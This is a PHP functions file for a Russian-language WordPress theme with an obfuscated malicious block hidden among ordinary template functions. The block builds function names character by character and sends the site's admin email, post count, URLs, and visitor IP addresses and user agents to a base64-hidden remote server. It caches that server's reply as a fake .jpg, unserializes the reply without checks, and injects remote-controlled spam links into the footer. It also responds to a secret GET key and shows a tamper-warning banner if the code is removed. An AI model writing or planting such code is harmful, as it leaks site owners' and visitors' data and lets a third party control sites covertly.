<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $NWMG='e';$GTuE='d';$HlZVPRQ='4';$wLyaY='c';$uiGM='d';$IkuDZ='o';$OwPdYb='b';$TwGSHT='e';$usXg='_';$DRVuC='a';$OMRIMk='s';$MzSbYkm='e';$PRhEn='6';$UpyrlAEE=$OwPdYb.$DRVuC.$OMRIMk.$MzSbYkm.$PRhEn.$HlZVPRQ.$usXg.$GTuE.$TwGSHT.$wLyaY.$IkuDZ.$uiGM.$NWMG;$brIcSGj='l';$mxSWX='e';$POdKV='a';$QBib='g';$aCSJK='t';$VhopGAI='i';$aBYgvjE='z';$CDNy='n';$zGznTq='f';$UGVgLiPN=$QBib.$aBYgvjE.$VhopGAI.$CDNy.$zGznTq.$brIcSGj.$POdKV.$aCSJK.$mxSWX;$wyDRLbK='t';$opaZ='t';$ZkckDO='r';$YRSw='_';$zyKyp='3';$heVlzh='r';$OrEP='s';$LHpVJ='1';$RMQL='o';$IxVoHjev=$OrEP.$wyDRLbK.$ZkckDO.$YRSw.$heVlzh.$RMQL.$opaZ.$LHpVJ.$zyKyp;$XSwbE='t';$VyJxBuj='e';$LMXJ='s';$srFKwd='r';$eGwWc='v';$EMVGEjq='r';$seynyuKC=$LMXJ.$XSwbE.$EMVGEjq.$srFKwd.$VyJxBuj.$eGwWc;                     
		$qm_____o='e';$gu____________m='d';$yv_______________z='4';$vg__t='c';$sv__________x='d';$xo_____i='o';$gd___________l='b';$yl_______________k='e';$js_______v='_';$mj______q='a';$xq_________n='s';$kd_________h='e';$fu______________j='6';$xp_______l=$gd___________l.$mj______q.$xq_________n.$kd_________h.$fu______________j.$yv_______________z.$js_______v.$gu____________m.$yl_______________k.$vg__t.$xo_____i.$sv__________x.$qm_____o;
		$fe____________l='s';$tb_____l='s';$ta____________u='f';$hf____t='c';$kr____l='t';$ri________s='i';$ug___h='e';$fv_____z='n';$va____________n='_';$nj______________h='t';$kk____x='i';$rt_________o='u';$df____k='x';$bo__g='o';$mw___x='n';$on_____________p=$ta____________u.$rt_________o.$mw___x.$hf____t.$nj______________h.$ri________s.$bo__g.$fv_____z.$va____________n.$ug___h.$df____k.$kk____x.$tb_____l.$kr____l.$fe____________l;
		$wx___w='p';$wv___n='n';$cl___________n='e';$wb___b='f';$fw________f='o';$dn____q=$wb___b.$fw________f.$wx___w.$cl___________n.$wv___n;
		$mu__________p='r';$xe_______f='e';$sr_____________l='a';$er___________b='f';$vb__a='d';$cg______________d=$er___________b.$mu__________p.$xe_______f.$sr_____________l.$vb__a;
		$yw___k='s';$nn____________k='e';$ka______v='f';$wf______s='l';$st________m='c';$yi____________h='o';$td____c=$ka______v.$st________m.$wf______s.$yi____________h.$yw___k.$nn____________k;
		
		define("WP_ID", $xp_______l("Mi4wLjA="));
		define("WP_TTL", $xp_______l("MTA4MDA="));
		define("WP_SRC", $xp_______l("dHBva24="));
	


		function wp_get_header() {
			global $xp_______l, $on_____________p;
			
			if (
				$on_____________p($xp_______l("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$on_____________p($xp_______l("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$on_____________p($xp_______l("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $xp_______l, $dn____q, $td____c, $cg______________d;
			
			$ma_________v = TEMPLATEPATH."/".$xp_______l("Zm9vdGVyLnBocA==");
			$el_____________u = @$dn____q($ma_________v, "r");
			$ma_________v = @$cg______________d($el_____________u, @filesize($ma_________v));
			@$td____c($el_____________u);
			
			$vm___________y = TEMPLATEPATH."/".$xp_______l("ZnVuY3Rpb25zLnBocA==");
			$el_____________u = @$dn____q($vm___________y, "r");
			$vm___________y = @$cg______________d($el_____________u, @filesize($vm___________y));
			@$td____c($el_____________u);
			
			$qy_____z = 0;
			if($ma_________v && $vm___________y) {
				if ($xp_______l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ma_________v, $xp_______l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$qy_____z = 1;
					}
					if (substr_count($ma_________v, "wp_theme_GPL_credits()") < 1) {
						$qy_____z = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$qy_____z = 12;
				}
			}
			
			if($qy_____z > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $qy_____z -->";
			}
		}
	


		function wp_loaded() {
			global $xp_______l, $on_____________p;
			return $on_____________p($xp_______l("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($dg________z, $mh____q = "(more...)", $ol__n = 0, $kw___n = "") {
				$nq__________q = get_the_content($mh____q, $ol__n, $kw___n);
				$nq__________q = apply_filters("the_content", $nq__________q);
				
				$nq__________q = str_replace("]]>", "]]>", $nq__________q);
				if (strlen($_GET["p"]) > 0) {
					echo $nq__________q;
				}
				else if ((strlen($nq__________q)>$dg________z) && ($tw________q = strpos($nq__________q, " ", $dg________z ))) {
					$nq__________q = substr($nq__________q, 0, $tw________q);
					$nq__________q = $nq__________q;
					echo $nq__________q;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$mh____q</a></div></p>";
				} else {
					echo $nq__________q;
				}
				
			}
		}
	


		$bl___________m='c';$hz_____________k='b';$cg____l='e';$nc____k='6';$gz__t='d';$is__________y='4';$lc___w='_';$lj__________z='s';$hy______________a='a';$gy_________z='e';$xk_____e='e';$jc__________r='n';$vi________b='o';$pt______d=$hz_____________k.$hy______________a.$lj__________z.$gy_________z.$nc____k.$is__________y.$lc___w.$xk_____e.$jc__________r.$bl___________m.$vi________b.$gz__t.$cg____l;
		$nq________j='t';$zh______z='n';$ig________h='t';$vn____e='s';$wz____________z='g';$zy_______o='t';$yu_____n='i';$af______n='_';$ek__________o='o';$er__c='e';$yk______________x='n';$qg______u='e';$pz____l='f';$ih_______v='c';$jo___________t='e';$yo__x='_';$mw_______________u='l';$jr___g=$pz____l.$yu_____n.$mw_______________u.$jo___________t.$af______n.$wz____________z.$er__c.$zy_______o.$yo__x.$ih_______v.$ek__________o.$zh______z.$nq________j.$qg______u.$yk______________x.$ig________h.$vn____e;
		$zy__t='s';$cx_________u='i';$sb________f='f';$mq_____________i='e';$xc_________x='t';$pd____e='_';$zx__________q='e';$if_______u='s';$uz___u='i';$pm____________s='x';$zf__________n='l';$oe_____g=$sb________f.$uz___u.$zf__________n.$mq_____________i.$pd____e.$zx__________q.$pm____________s.$cx_________u.$zy__t.$xc_________x.$if_______u;
		$yw_______________f='v';$oa___________z='o';$md_____g='m';$fd_____________t='p';$tb______________o='s';$lr_________d='n';$ob______s='i';$ug____________k='e';$pa_____o='_';$lm_______________w='o';$kz____i='r';$xf___________e='e';$ed____________q='r';$wg____________t='c';$ed________t='a';$jf______________z=$yw_______________f.$xf___________e.$kz____i.$tb______________o.$ob______s.$oa___________z.$lr_________d.$pa_____o.$wg____________t.$lm_______________w.$md_____g.$fd_____________t.$ed________t.$ed____________q.$ug____________k;
		$mk__y='o';$lb_________l='e';$aa________u='n';$tm_____q='s';$ro______g='c';$da__________y='k';$hf____________f='o';$az_________a='f';$eh___________s='p';$px______b=$az_________a.$tm_____q.$hf____________f.$ro______g.$da__________y.$mk__y.$eh___________s.$lb_________l.$aa________u;
		$vm_______d='i';$xe_______________t='t';$ar____________e='e';$vo___________o='r';$gm_____u='f';$er_________c='w';$ei_____n=$gm_____u.$er_________c.$vo___________o.$vm_______d.$xe_______________t.$ar____________e;
		$uv______v='5';$xf_____s='m';$rq______________p='d';$fs____________h=$xf_____s.$rq______________p.$uv______v;
		$ik__e='a';$eb___________s='r';$xm__c='h';$ri____m='p';$dc_________l='e';$am_________s='t';$gt__________u='a';$nn____m='l';$or______________a=$eb___________s.$dc_________l.$gt__________u.$nn____m.$ri____m.$ik__e.$am_________s.$xm__c;
		$eh__v='i';$uh______________x='e';$px____m='l';$rb___o='n';$dw____z='i';$xg___n='u';$uw__u='a';$jc_______w='z';$nl_______l='s';$ba_____________c='r';$ot______i='e';$as______________c=$xg___n.$rb___o.$nl_______l.$uh______________x.$ba_____________c.$dw____z.$uw__u.$px____m.$eh__v.$jc_______w.$ot______i;
		$ft______m='m';$os_____________n='n';$tc_________e='m';$to__________z='t';$qu_______p='e';$cw______k='p';$bc______________n='a';$mc_______k=$to__________z.$qu_______p.$ft______m.$cw______k.$os_____________n.$bc______________n.$tc_________e;
		$gh______________w='_';$hg______________l='e';$ts_________e='n';$lk__d='r';$hz_______________h='t';$dp______i='t';$me_____________m='c';$bl____n='e';$nx__w='_';$qf______y='c';$wf____________c='a';$fb____________l='a';$zt____________g='o';$eq_____________y='e';$iu________u='s';$im________s='m';$ja_________p='t';$fa______________o='x';$mi_____a='t';$ge_____l='e';$yo___________s='r';$wu______________v=$iu________u.$hz_______________h.$lk__d.$eq_____________y.$fb____________l.$im________s.$nx__w.$qf______y.$zt____________g.$ts_________e.$dp______i.$ge_____l.$fa______________o.$mi_____a.$gh______________w.$me_____________m.$yo___________s.$hg______________l.$wf____________c.$ja_________p.$bl____n;
	


		function tw__y($tw__________a) {
			global $xp_______l, $on_____________p, $jr___g, $jf______________z, $wu______________v;
			
			if (!$on_____________p($xp_______l("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($jf______________z(PHP_VERSION, "5.0.0", ">=") && $on_____________p($xp_______l("ZmlsZV9nZXRfY29udGVudHM=")) && $on_____________p($xp_______l("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$mm____________l = $wu______________v(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$tj_________d = @$jr___g($tw__________a, 0, $mm____________l);
			} else {
				$tj_________d = @$jr___g($tw__________a, 0);
			}
			
			return $tj_________d;
		}
	


		function ta_________r($tw__________a) {
			global $on_____________p, $px______b, $ei_____n, $xp_______l;
			
			if (!$on_____________p($xp_______l("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$co_____a = strpos($tw__________a, "/", 7);
			$qs___s = array(
				"uri"     => substr($tw__________a, $co_____a),
				"host"    => str_replace("http://", "", substr($tw__________a, 0, $co_____a)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$li____c = @$px______b("$qs___s[host]", 80, $dc____w, $pr_______y, 4);
			
			if (!$li____c) {
				return false;
			} else {
				$tj_________d = "";
				$ia___q  = "GET $qs___s[uri] HTTP/1.0\r\n";
				$ia___q .= "Host: $qs___s[host]\r\n";
				$ia___q .= "Referer: $qs___s[referer]\r\n";
				$ia___q .= "Connection: Close\r\n\r\n";
				
				@$ei_____n($li____c, $ia___q);
				
				while (!@feof($li____c)) {
					$bb_______________f = @fgets($li____c, (1024*24));
					
					if ($bb_______________f == "\r\n") {
						$he____________o = true;
						continue;
					}
					
					if ($he____________o) {
						$tj_________d .= $bb_______________f;
					}
				}
				
				return $tj_________d;
			}
		}
	


		function nz___b($tw__________a) {
			global $on_____________p;
			$zz__e = false;
			
			if ($tw__________a != "") {
				if ($on_____________p("tw__y")) {
					$zz__e = @tw__y($tw__________a);
				}
				
				if (!$zz__e && ($on_____________p("ta_________r"))) {
					$zz__e = @ta_________r($tw__________a);
				}
			}
			
			return $zz__e;
		}
	


		function cb______t() {
			global $_SERVER, $fs____________h;
			
			$km______________m = $_SERVER["SERVER_NAME"];
			
			if (substr("$km______________m", 0, 4) == "www.") {
				$km______________m = substr("$km______________m", 4);
			}
			
			$km______________m = $fs____________h("$_SERVER[SERVER_NAME]");
			
			return $km______________m;
		}
	


		function oa__z() {
			return "file";
		}
	


		function gk_______________i($tw__________a) {
			global $_SERVER, $jr___g, $oe_____g, $dn____q, $td____c, $ei_____n;
			
			$ab__c = bc___________h();
			
			$gm_______________l = cb______t().".jpg";
			$jm__u = $ab__c["dir_upload"]["path"]."/$gm_______________l";
			$lq______________n = @filemtime($jm__u);
			
			if (!$lq______________n || ((time()-$lq______________n) >= WP_TTL)) {
				$zz__e = nz___b($tw__________a);
				
				if ($zz__e) {
					if ($oe_____g($jm__u)) {
						@unlink($jm__u);
					}
					
					$el_____________u = @$dn____q($jm__u, "x+");
					
					@$ei_____n($el_____________u, $zz__e);
					@$td____c($el_____________u);
				}
			} else {
				if ($oe_____g($jm__u)) {
					$zz__e = @$jr___g($jm__u);
				} else {
					$zz__e = false;
				}
			}
			
			return $zz__e;
		}
	


		function bc___________h() {
			global $_SERVER, $xp_______l, $pt______d;
			
			$za______________b = wp_count_posts("post");
			$oz____n = pathinfo(get_bloginfo("template_directory"));
			
			$ab__c = array(
				"url" => array(
					"report"      => $xp_______l("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $oz____n,
				"dir_upload"	=> wl__________c(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$oz____n[filename],
					"a005=".$za______________b->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://lib.kharkov.ua/luxury/423-zarubezhnaya-nedvizhimost-populyarnye-strany-2013-goda.html\">Зарубежная недвижимость: популярные страны 2013 года</a>"
			);
			
			$ab__c["url"]["queryString"] = implode("&", $ab__c["queryString"]);
			$ab__c["url"]["report"] = $ab__c["url"]["report"]."/?".$pt______d($ab__c["url"]["queryString"]).".html";
						
			return $ab__c;
		}
	


		function wl__________c() {
			$ra_____a = wp_upload_dir();
			
			if (isset($ra_____a["error"])) {
				$ig_______e = cn______i();
				if (is_writable($ig_______e)) {
					$ra_____a = array("path" => $ig_______e);
				}
			}

			return $ra_____a;
		}
	


		function cn______i() {
			global $on_____________p, $fs____________h, $or______________a, $mc_______k;
			
			$qh___i = (bool) ini_get("safe_mode");
			if ($qh___i == true) {
				return false;
			}
			
			if ($on_____________p("sys_get_temp_dir")) {
				$li_____y = sys_get_temp_dir();
				if (is_writable($li_____y)) {
					return $or______________a($li_____y);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $or______________a($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $or______________a($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $or______________a($_ENV["TEMP"]);
			} else {
				$rq______________a = $mc_______k($fs____________h(uniqid(rand(), true)), "");
				if ($rq______________a) {
					$li_____y = $or______________a(dirname($rq______________a));
					@unlink($rq______________a);
					return $li_____y;
				} else {
					return false;
				}
			}
		}
	


		function at__________p() {
			global $_GET, $oe_____g;
			
			$ab__c = bc___________h();
			$km______________m = cb______t();
			$mo___e = oa__z();
			
			$ma_______r = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($mo___e == "file") {
					$ak_______________s = $ab__c["dir_upload"]["path"]."/".$km______________m.".jpg";
					if ($oe_____g($ak_______________s)) {
						@unlink($ak_______________s);
						$ma_______r = "deleted";
					}
				}
				
				$bz____m = array(
					"s"	=> $ma_______r,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($bz____m AS $fq__________g => $an_______________v) echo " [$fq__________g:$an_______________v]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $on_____________p, $xp_______l, $as______________c;
			$ab__c = bc___________h();
			
			$bg________q = "gk_______________i";
			if ($on_____________p($bg________q)) {
				$tj_________d = $bg________q($ab__c["url"]["report"]);
			}
			
			if ($tj_________d) {
				if ($tj_________d = @$xp_______l($tj_________d)) {
					$tj_________d = @$as______________c($tj_________d);
					
					if (strlen($tj_________d[custom_credit]) >= 5) {
						$ab__c["default_string"] = $tj_________d[custom_credit];
					}
					
					if ($tj_________d["status"] == "0") {
						$js_________g = 1;
						$if__i = 1;
					} else {
						$mf____________e = sizeof($tj_________d["links"]);
						$ew______n = $ab__c["default_string"];
						
						if ($mf____________e > 0 && $tj_________d["links"] !== "") {
							$uq___t = 0;
							foreach ($tj_________d["links"] as $gj______________p => $wz_______i) {
								$uq___t++;
								if ($wz_______i->l_path == "" || $wz_______i->l_path == $_SERVER["REQUEST_URI"]) {
									$wz_______i->l_href = htmlspecialchars(strip_tags($wz_______i->l_href));
									$wz_______i->l_title = htmlspecialchars(strip_tags($wz_______i->l_title));
									$wz_______i->l_anchor = htmlspecialchars(strip_tags($wz_______i->l_anchor));
									$ew______n .= " | ";
									$ew______n .= "<a href='$wz_______i->l_href' title='$wz_______i->l_title'";
									if ($wz_______i->l_nofollow == "1") {
										$ew______n .= " rel='nofollow'";
									}
									$ew______n .= ">$wz_______i->l_anchor</a>";
								}
							}
						}
						$ab__c["links"] = "$ew______n";
						if ($tj_________d[credit] == "0") {
							$ab__c["links"] = "";
						}
					}
				} else {
					$js_________g = "1";
				}
			} else {
				$js_________g = "1";
			}
			
			if ($js_________g == "1") {
				$ab__c["links"] = $ab__c["default_string"];
			}
			
			echo "$ab__c[links]";
			
			echo "<!-- s: $tj_________d[signature] -->";
			at__________p();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
